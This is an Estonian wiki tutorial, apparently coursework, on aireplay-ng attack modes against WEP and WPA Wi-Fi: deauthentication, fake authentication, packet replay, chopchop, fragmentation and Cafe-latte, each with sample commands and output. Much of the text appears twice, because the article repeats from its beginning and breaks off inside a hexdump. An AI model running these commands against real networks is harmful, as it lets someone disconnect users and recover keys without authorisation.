Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre>$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Saving chosen packet in replay_src-0001-123456.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
...
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0001-123457.cap
Saving keystream in replay_dec-0001-123456.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Waiting for a data packet...
Read 96 packets...

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = CC:CC:CC:CC:CC:CC
Source MAC = BB:BB:BB:BB:BB:BB

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ? y
Saving chosen packet in replay_src-0001-123456.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0001-123456.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

<pre>
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0
...
</pre>

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:23:12Z

Tliiv: /* Rünnak 5: Fragmentation attack */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

